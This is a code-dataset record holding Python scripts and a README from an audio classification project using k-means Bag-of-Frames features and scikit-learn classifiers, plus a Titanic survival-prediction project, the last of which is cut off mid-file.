"text": "#test\r\nfrom time import time\r\ndef svm_predict(training_samples, training_labels, test_samples, test_lables, kernel = \"rbf\" , C = 1.0):\r\n\tfrom sklearn.svm import SVC\r\n\r\n\tclf = SVC(kernel = kernel, C =C)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(test_lables,pred)\r\n\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"SVM\"))\r\n\t\toutfile.write(\"kernel = {}\\n\".format(kernel))\r\n\t\toutfile.write(\"C = {}\\n\".format(C))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\t\r\ndef naive_bayes_predict(training_samples, training_labels, test_samples, test_lables):\r\n\tfrom sklearn.naive_bayes import GaussianNB\r\n\r\n\tclf = GaussianNB()\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Naive Bayes\"))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\n\r\ndef decision_tree_predict(training_samples, training_labels, test_samples, test_lables, criterion = \"gini\", min_samples_split = 2):\r\n\tfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n\tclf = DecisionTreeClassifier(criterion = criterion,min_samples_split = min_samples_split)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Decision Tree\"))\r\n\t\toutfile.write(\"criterion = {}\\n\".format(criterion))\r\n\t\toutfile.write(\"min_samples_split = {}\\n\".format(min_samples_split))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\ndef knn_predict(training_samples, training_labels, test_samples, test_lables,k_neighbours = 5,weights = \"uniform\",algorithm = \"auto\"):\r\n\tfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\n\tclf = KNeighborsClassifier(n_neighbors = k_neighbours, weights =weights, algorithm = algorithm)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"KNN\"))\r\n\t\toutfile.write(\"K = {}\\n\".format(k_neighbours))\r\n\t\toutfile.write(\"weight = {}\\n\".format(weights))\r\n\t\toutfile.write(\"algorithm = {}\\n\".format(algorithm))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\ndef adaboost_predict(training_samples, training_labels, test_samples, test_lables,n_estimators=50, learning_rate=1.0):\r\n\tfrom sklearn.ensemble import AdaBoostClassifier\r\n\r\n\tclf = AdaBoostClassifier(n_estimators = n_estimators, learning_rate =learning_rate)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Adaboost\"))\r\n\t\toutfile.write(\"Estimators = {}\\n\".format(n_estimators))\r\n\t\toutfile.write(\"Learning rate = {}\\n\".format(learning_rate))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\ndef randomforest_predict(training_samples,training_labels,test_samples,test_lables,n_estimators =100,criterion = 'gini',min_samples_split=2):\r\n\tfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\tclf = RandomForestClassifier(n_estimators=n_estimators, criterion=criterion, min_samples_split=min_samples_split)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(test_lables,pred)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Random Forest\"))\r\n\t\toutfile.write(\"Estimators = {}\\n\".format(n_estimators))\r\n\t\toutfile.write(\"Criterion = {}\\n\".format(criterion))\r\n\t\toutfile.write(\"min_samples_split = {}\\n\".format(min_samples_split))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\n\r\n\r\nimport numpy as np \r\nfeatures_train = np.loadtxt(\"Temp\\\\derived_features_train.csv\",delimiter = \",\")\r\nlabels_train = np.loadtxt(\"Temp\\\\derived_labels_train.csv\",delimiter = \",\")\r\nfeatures_test = np.loadtxt(\"Temp\\\\derived_features_test.csv\",delimiter=\",\")\r\nlabels_test = np.loadtxt(\"Temp\\\\derived_labels_test.csv\",delimiter=\",\")\r\n\r\n\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\n#first normalize horizontally \r\nfeatures_train = np.transpose(features_train)\r\nfeatures_test = np.transpose(features_test)\r\n\r\nmodel_normalizer_horizontal = MinMaxScaler()\r\nmodel_normalizer_horizontal.fit(features_train)\r\n\r\nfeatures_train = model_normalizer_horizontal.transform(features_train)\r\n\r\n\r\nmodel_normalizer_horizontal = MinMaxScaler()\r\nmodel_normalizer_horizontal.fit(features_test)\r\nfeatures_test = model_normalizer_horizontal.transform(features_test)\r\n\r\nfeatures_train = np.transpose(features_train)\r\nfeatures_test = np.transpose(features_test)\r\n\r\n\r\n#normalize vertically\r\n\r\nmodel_normalizer_vertical = MinMaxScaler()\r\nmodel_normalizer_vertical.fit(features_train)\r\n\r\nfeatures_train = model_normalizer_vertical.transform(features_train)\r\nfeatures_test = model_normalizer_vertical.transform(features_test)\r\n\r\n\r\nimport sys\r\nclassifier = sys.argv[1]\r\nclassifier = classifier.lower()\r\n\r\nif classifier == \"svm\":\r\n\tsvm_predict(features_train,labels_train,features_test,labels_test,kernel = \"linear\", C = 1.0)\r\nelif classifier == \"nb\":\r\n\tnaive_bayes_predict(features_train,labels_train,features_test,labels_test)\r\nelif classifier == \"dt\":\r\n\tdecision_tree_predict(features_train,labels_train,features_test,labels_test,criterion=\"gini\",min_samples_split=20)\r\nelif classifier == \"knn\":\r\n\tknn_predict(features_train,labels_train,features_test,labels_test,k_neighbours =11,weights = \"distance\",algorithm = \"kd_tree\")\r\nelif classifier == \"adaboost\":\r\n\tadaboost_predict(features_train,labels_train,features_test,labels_test,n_estimators=100, learning_rate=1)\r\nelif classifier == \"rf\":\r\n\trandomforest_predict(features_train,labels_train,features_test,labels_test,n_estimators=1000,criterion='gini',min_samples_split=2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7431332468986511,
"alphanum_fraction": 0.7533062100410461,
"avg_line_length": 60.390625,
"blob_id": "d340bc8d2c9ad1c876f457f2702c55e1d7a8bc28",
"content_id": "0831f09cfcc5c9dc2dcb90faaa63a55ea0538229",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3932,
"license_type": "permissive",
"max_line_length": 693,
"num_lines": 64,
"path": "/README.md",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\n# Audio Classification using Bag-of-Frames approach\n\n## Requirements\n\n### Python 2.7.10 \n\n### Python modules \n\n 1. Librosa 0.4.3\n 2. numpy 1.11.3\n 3. sklearn 0.18\n \n## Execution \n\nDivide the audio into smaller clips of 5-20 secs each . One audio clip is converted into one feature which contains the Bag of Frames for that audio clip. \n\n1. Place the training and the test data in a folder by numbering the categories. Example, if the source folder is \"Data\"\n \n Data -> 1 -> test -> \"test audio files of category 1\" <br />\n Data -> 1 -> train -> \"train audio files of category 1\"<br />\n Data -> 2 -> test -> \"test audio files of category 2\"<br />\n Data -> 2 -> train -> \"test audio files of category 2\"<br />\n \n2. ```python train.py window_length no_of_clusters ```\n\n window_length : Window length to divide the audio clip to <br />\n no_of_clusters : No of cluster centroids for k-means clustering <br />\n \n3. ```python test.py classifier``` \n\n classifiers : svm,nb,dt,knn,adaboost,rf<br />\n Change the parameters in the test.py file to change the parameters of the classifiers.<br />\n All the results are stored in the \"Temp\" Folder\n\n## Project Description \nHuman speech can be broken down into elementary phonemes and can be modeled using algorithms like Hidden Markov Models (HMM). Stationary patterns like rhythm and melody can be used in classification of music. In contrast, Non speech sounds are random, unstructured, and lack the high level structures observed in speech and music, which makes it difficult to model them using HMM. In this project, the Bag of Frames approach is used to classify audio where a codebook of vectors is generated using K-Means clustering on the training data and Bag of Frames for each of the audio clip is obtained using the codebook. These Bag of Frames are used as input to the classifiers for classification. \n\nThe steps involved in the Bag of Frames approach for Environmental Sound Classification is described as follows: \n\n\nA.\tFeature Extraction\n \n 1. For the purpose of feature extraction, the audio clip is divided into several segments by choosing a particular window length. \n 2. Then features are extracted for each of the audio segment.\n 3. Python libraries Librosa and Scikits are used to extract audio features like MFCC, delta MFCC, Linear Predictive Coding(LPC) coefficients along with other frequency domain features like Mel Spectrogram, Spectral Centroid, Spectral Bandwidth, Spectral Roll Off and temporal domain features like Root Mean Square Error (RMSE) and Zero Crossing Rate. \n \n \nB.\tK-Means Clustering and Codebook generation\n\n 1. Once the features are extracted, the whole training and test data is divided into training and test dataset. \n 2. Feature scaling and normalization of training data is done accross each feature.\n 3. The normalized training data is fed into K-Means clustering algorithm with the number of clusters usually much higher than the total number of classes and the cluster centroids are obtained for the normalized training set. \n 4. These cluster centroids form the codebook. \n\nC.\tBag of Frames\n \n 1. In the next step, the feature samples from each of the audio clip are vector quantized with respect to the codebook generated and Bag of Frames is obtained from K-Means output.\n \nD.\tClassification\n\n 1. The Bag of Frames is first normalized across each audio clip and later normalized across each of the features. The resultant vectors are labelled accordingly and then used to train a supervised classifier like SVM, KNN or Random Forest.\n \n \nThe test phase includes similar steps where features extracted from the audio clips are normalized and vector quantized using the codebook, followed by obtaining the Bag of Frames for each audio clip. The normalized Bag of Frames are then given as input to the classifier to obtain the final output.\n\n\n"
},
{
"alpha_fraction": 0.6828309297561646,
"alphanum_fraction": 0.6841415762901306,
"avg_line_length": 17.461538314819336,
"blob_id": "67a109de922076d267d0ecc801a014f853698a9b",
"content_id": "778b76eb30b58c10dd74ba1738ecd4de056d0e7b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 763,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 39,
"path": "/src/kmeans_train.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "import os\r\nimport numpy as np \r\nimport sys \r\n\r\nprint \"Running kmeans clustering .. \"\r\n\r\nno_clusters = sys.argv[1]\r\n\r\nif no_clusters.isdigit() == False:\r\n\t\"No of clusters has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\nno_clusters = int(no_clusters)\r\nfeatures_train = np.loadtxt(\"Temp\\\\features_train.csv\",delimiter = \",\")\r\n\r\n\r\nimport pickle\r\nwith open(\"Temp\\\\kmeans_normalizer.p\",\"rb\") as infile:\r\n\tnormalizer = pickle.load(infile)\r\n\r\n\r\nfeatures_train = normalizer.transform(features_train)\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\n\r\n\r\nkmeans = KMeans(n_clusters = no_clusters).fit(features_train)\r\n\r\n\r\n\r\nwith open(\"Temp\\\\kmeans_{}.p\".format(no_clusters),\"wb\") as outfile:\r\n\tpickle.dump(kmeans,outfile)\r\n\r\noutfile.close()\r\n\r\n\r\nprint \"\\nClusters generated and saved\"\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6731851100921631,
"alphanum_fraction": 0.6817572712898254,
"avg_line_length": 23.9375,
"blob_id": "bcb8831d91751b8e991dbbd256f84433851fb235",
"content_id": "e5557c60606c686b571c4ed45b693545bb8290c1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3733,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 144,
"path": "/src/generate_derived_training_test_data.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "import os\r\nimport numpy as np \r\n\r\nimport pickle\r\n\r\nimport sys\r\n\r\n\r\nprint \"\\nGenerating bag of frames...\"\r\n\r\nclusters = sys.argv[1]\r\n\r\nif clusters.isdigit() == False:\r\n\t\"No of clusters has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\n#loading the normalizer for kmeans \r\nwith open(\"Temp//kmeans_normalizer.p\",\"rb\") as infile:\r\n\tkmeans_normalizer = pickle.load(infile)\r\ninfile.close()\r\n\r\n#consider kmeans with 50 cluster centers \r\nwith open(\"Temp/kmeans_{}.p\".format(clusters),\"rb\") as infile:\r\n\tkmeans = pickle.load(infile)\r\ninfile.close()\r\n\r\n\r\n\r\nno_of_centers = kmeans.cluster_centers_.shape[0]\r\n\r\n\r\nsourceFolder = \"Temp//csv\"\r\nsourceFolderFullPath = os.path.abspath(sourceFolder)\r\n\r\ndirs = os.listdir(sourceFolderFullPath)\r\n\r\n#getting derived training data\r\n\r\nderived_features = []\r\nderived_labels = []\r\n\r\nfor dir in dirs:\r\n\r\n\r\n\tlabel = int(dir)\r\n\r\n\tfeaturesTrainPath = \"{}/{}/train\".format(sourceFolderFullPath,dir)\r\n\r\n\ti = 0\r\n\tj = 0\r\n\tfor file in os.listdir(featuresTrainPath):\r\n\t\t\r\n\t\tif \"csv\" in file :\r\n\r\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTrainPath,file)\r\n\r\n\t\t\t#getting training features of a file\r\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\r\n\r\n\t\t\t# #pca \r\n\t\t\t# temp_features = pca.transform(temp_features)\r\n\r\n\t\t\t#remove rows with nan values \r\n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\r\n\r\n\t\t\t#normalizer the features for kmeans \r\n\t\t\ttemp_features = kmeans_normalizer.transform(temp_features)\r\n\r\n\r\n\t\t\t#get kmeans output \r\n\t\t\tkmeans_output = kmeans.predict(temp_features)\r\n\r\n\r\n\t\t\t#getting bag of words as sample\r\n\t\t\tunique, counts = np.unique(kmeans_output, return_counts=True)\r\n\t\t\tsample = [0]*no_of_centers\r\n\t\t\tfor j in range(no_of_centers):\r\n\t\t\t\tif j in unique:\r\n\t\t\t\t\tsample[j] = counts[np.where(unique == j)][0]\r\n\r\n\t\t\t\t\r\n\t derived_features.append(sample)\r\n\t derived_labels.append(int(label))\r\n\r\n\r\n\r\nderived_features = np.array(derived_features).astype(np.float64)\r\nderived_labels = np.expand_dims(derived_labels,axis=1).astype(np.int32)\r\nnp.savetxt(\"Temp\\\\derived_features_train.csv\",derived_features,fmt='%1.3f',delimiter=\",\")\r\nnp.savetxt(\"Temp\\\\derived_labels_train.csv\",derived_labels,fmt='%1.3f',delimiter = \",\")\r\n\r\n\r\n#getting derived test features.\r\n\r\nderived_features = []\r\nderived_labels = []\r\n\r\nfor dir in dirs:\r\n\tlabel = int(dir)\r\n\r\n\tfeaturesTestPath = \"{}/{}/test\".format(sourceFolderFullPath,dir)\r\n\r\n\ti = 0\r\n\tj = 0\r\n\tfor file in os.listdir(featuresTestPath):\r\n\t\t\r\n\t\tif \"csv\" in file :\r\n\r\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTestPath,file)\r\n\r\n\t\t\t#getting training features of a file\r\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\r\n\r\n\r\n\t\t\t#remove rows with nan values \r\n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\r\n\r\n\t\t\t#normalizer the features for kmeans \r\n\t\t\ttemp_features = kmeans_normalizer.transform(temp_features)\r\n\r\n\t\t\t#get kmeans output \r\n\t\t\tkmeans_output = kmeans.predict(temp_features)\r\n\r\n\r\n\t\t\t#getting bag of words as sample\r\n\t\t\tunique, counts = np.unique(kmeans_output, return_counts=True)\r\n\t\t\tsample = [0]*no_of_centers\r\n\t\t\tfor j in range(no_of_centers):\r\n\t\t\t\tif j in unique:\r\n\t\t\t\t\tsample[j] = counts[np.where(unique == j)][0]\r\n\r\n\t\t\t\t\r\n\t derived_features.append(sample)\r\n\t derived_labels.append(int(label))\r\n\r\n\r\nderived_features = np.array(derived_features).astype(np.float64)\r\nderived_labels = np.expand_dims(derived_labels,axis=1).astype(np.int32)\r\nnp.savetxt(\"Temp\\\\derived_features_test.csv\",derived_features,fmt='%1.3f',delimiter=\",\")\r\nnp.savetxt(\"Temp\\\\derived_labels_test.csv\",derived_labels,fmt='%1.3f',delimiter = \",\")\r\n\r\n\r\nprint \"Bag of frames generated and saved\\n Training completed. Please run test.py by selecting a classifier to test the data\""
}
] | 8 |
suno09/Titanic
|
https://github.com/suno09/Titanic
|
4abe76b4933ec5fd3d98fb33759ed705e38178d9
|
39a36359a55e16da6f55c4d3e8b1970ee799e0f1
|
a0596830a693f8a4f30a883370072cefb6139943
|
refs/heads/master
| 2020-04-03T23:17:08.649254 | 2018-10-31T22:04:11 | 2018-10-31T22:04:11 | 155,309,461 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6994313597679138,
"alphanum_fraction": 0.7091795206069946,
"avg_line_length": 29.024391174316406,
"blob_id": "8d81e4ee5a5b8851dabc711857b3c63c70a6fef6",
"content_id": "38ad85301e487789d7252c56a58dcc231cb0bff5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1231,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 41,
"path": "/classification_pca.py",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "import pickle\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\n\n# Load the classifier\nwith open('classifiers/best_classifier_pca.pik', 'rb') as rp:\n classifier = pickle.load(rp)\n\nwith open('classifiers/dataframe_titanic.pik', 'rb') as rp:\n dataframe = pickle.load(rp)\ndf_prep = dataframe[891:]\n\nobject_cols = df_prep.select_dtypes(\"object\").columns\n\n# Convert the categorical data to numbers\nlabel_encoders = classifier['label_encoders']\nfor obj_col in object_cols:\n label_encoder = LabelEncoder()\n label_encoder.fit(df_prep[obj_col])\n df_prep[[obj_col]] = df_prep[[obj_col]].apply(label_encoder.transform)\n label_encoders[obj_col] = label_encoder\n\n# generate the input of test\nx = df_prep.drop(['Survived'], 1).values.astype(np.float64)\n\n# transform data test with PCA Algotirhm\nx = classifier['pca'].transform(x)\n\n# predict with classifier\nprint(\"Predict with %s\" % classifier['algorithm'])\n\ny = classifier['classifier'].predict(x)\ndf_test = pd.DataFrame(\n data=list(zip(range(892, 892 + len(df_prep)), y.astype(np.int))),\n columns=['PassengerId', 'Survived']\n)\n\ndf_test.to_csv(path_or_buf='classifiers/predict_test_titanic.csv', sep=',',\n index=False)\n"
},
{
"alpha_fraction": 0.6266268491744995,
"alphanum_fraction": 0.6330746412277222,
"avg_line_length": 33.044715881347656,
"blob_id": "f36042805f548f167633c06c1020bb7e48bd89e5",
"content_id": "58c32a508453f1092de4dc5d65042dfe9698acbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8375,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 246,
"path": "/classification_threads.py",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "import itertools\nimport re\nimport sys\nfrom queue import Queue\nfrom threading import Thread, Lock\nfrom time import time, strftime, gmtime\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nstart_time = time()\n\nprint_lock = Lock()\n\nindex_th = 0\nresults = []\n\n\ndef thread_classifier(ml_class, str_classifier, cols,\n x_tr, x_te, y_tr, y_te,\n q: Queue, tnbr_tests):\n\n # Start generate model\n ml_class.fit(x_tr, y_tr)\n\n # save the result\n q.put({\n \"features\": cols,\n \"algorithm\": str_classifier,\n \"accuracy\": accuracy_score(y_te, ml_class.predict(x_te))\n })\n\n # print the progression\n global index_th\n index_th += 1\n progress_value = index_th * 100. / tnbr_tests\n with print_lock:\n sys.stdout.write(\"\\r\")\n sys.stdout.write(\"Progression |%-100s| %.2f %%\" %\n (\"\\u2588\" * int(progress_value), progress_value)\n )\n sys.stdout.flush()\n\n\n# * Data preprocessing\n# read csv file train and test\ndataframe = pd.read_csv('data/train.csv')\n\n# Create column NameType(Mr, Mrs, ...) from Name\ndataframe['NameType'] = [\n re.sub(r'.+?, (.+?)\\..*', r'\\1', name) for name in dataframe.Name\n]\ndataframe.NameType = dataframe.NameType.replace(\n ['Sir', 'Capt', 'Major', 'Don', 'Rev', 'Jonkheer', 'Col'],\n \"Mr\"\n)\ndataframe.NameType = dataframe.NameType.replace(\n ['Mlle', 'Lady', 'Mme', 'Miss', 'Mrs', 'the Countess'],\n \"Ms\"\n)\n\n# replace row contains sex = female and nameType = Dr by Ms\ndataframe.loc[\n (dataframe.Sex == \"female\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Ms\"\n# replace row contains sex = male and nameType = Dr by Mr\ndataframe.loc[\n (dataframe.Sex == \"male\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Mr\"\n\n# create family size\ndataframe['FamilySize'] = dataframe.SibSp + dataframe.Parch\n# Fare per passenger (fare per ticket)\ndataframe['FarePerPerson'] = dataframe.Fare / (dataframe.FamilySize + 1)\n\n# replace the NaN with \"Unknown\"\ndataframe.Cabin.fillna('', inplace=True)\n# create the count of Cabin\ndataframe['CabinCount'] = dataframe.Cabin.apply(\n lambda c: len(str(c).strip().split())\n)\n# create the number of Cabin (nbr after the letter)\n# (if exist one or more of cabins so get the first else 0)\ndataframe['NbrOfCabin'] = dataframe.Cabin.apply(\n lambda cs: list(filter(\n lambda c: len(c) > 1, str(cs).strip().split()\n ))\n)\ndataframe.NbrOfCabin = [\n int(c[0][1:]) if c != [] else 0 for c in dataframe.NbrOfCabin\n]\n# Create Column and take the first letter of the cabin and\ndataframe['CabinType'] = dataframe.Cabin\ndataframe.CabinType = [c[0] if c else 'U' for c in dataframe.CabinType]\n# person per Cabin\ndataframe['PersonPerCabin'] = (dataframe.FamilySize + 1) / dataframe.CabinCount\ndataframe.loc[\n dataframe.PersonPerCabin == np.inf, 'PersonPerCabin'\n] = dataframe.loc[dataframe.PersonPerCabin == np.inf, 'FamilySize']\n# Fare of cabin\ndataframe['FareOfCabin'] = dataframe.Fare / dataframe.CabinCount\ndataframe.loc[\n (dataframe.FareOfCabin == np.inf) | dataframe.FareOfCabin.isnull(),\n 'FareOfCabin'\n] = 0\n# # Create column and set the cabin by position\n# A = best pos, ..., G = worst pos, U = worst pos\n# cabin_pos = {v: 1./k for k, v in enumerate(\n# ['T', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'U'], 1)}\n# dataframe['CabinPos'] = [cabin_pos[c] for c in dataframe.CabinType]\n\n#\ndataframe.Age = dataframe.groupby([\"NameType\"]).transform(\n lambda a: a.fillna(a.mean())\n).Age\n#\ndataframe.Embarked.fillna('U', inplace=True)\n\n# the new dataframe with deleting some columns\ndf_prep = dataframe.drop(\n ['PassengerId', 'Name', 'Ticket', 'Cabin'],\n axis=1\n)\n\n# get the list of target Survived\ny_target = df_prep.Survived.values\ndf_prep = df_prep.drop(['Survived'], axis=1)\n\n# get the cols of type \"object\"\n# object_cols = ['Sex', 'Embarked', 'NameType', 'CabinType']\nobject_cols = df_prep.select_dtypes(\"object\").columns\n# Convert the categorical data to numbers\ndf_prep[object_cols] = df_prep[object_cols].apply(LabelEncoder().fit_transform)\n\n# generate the classifiers\n# key : name of algorithm\n# value : list of size 2 which contains algorithm and params of algo\nclassifiers = {\n \"Logistic Regression\": [LogisticRegression, {'random_state': 0}],\n \"KNN\": [KNeighborsClassifier,\n {'n_neighbors': 5, 'metric': 'minkowski', 'p': 2}],\n \"SVM 